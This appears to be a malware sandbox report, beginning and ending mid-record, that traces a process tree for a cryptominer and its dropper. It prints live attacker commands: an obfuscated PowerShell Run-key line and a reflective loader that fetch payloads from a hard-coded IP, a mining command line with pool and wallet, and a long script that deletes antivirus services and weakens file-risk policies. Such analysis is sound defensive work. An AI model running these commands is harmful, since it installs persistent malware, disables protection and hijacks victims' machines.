  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Executes dropped EXE
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
  - Checks BIOS information in registry
  - Checks whether UAC is enabled

C:\ProgramData\Data\Database.exe (level 6)
  Command line: -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666

C:\Users\Admin\AppData\Local\Temp\8563.exeC:\Users\Admin\AppData\Local\Temp\8563.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\898B.exeC:\Users\Admin\AppData\Local\Temp\898B.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete 
"HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t 
REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d 
"%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add 
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete 
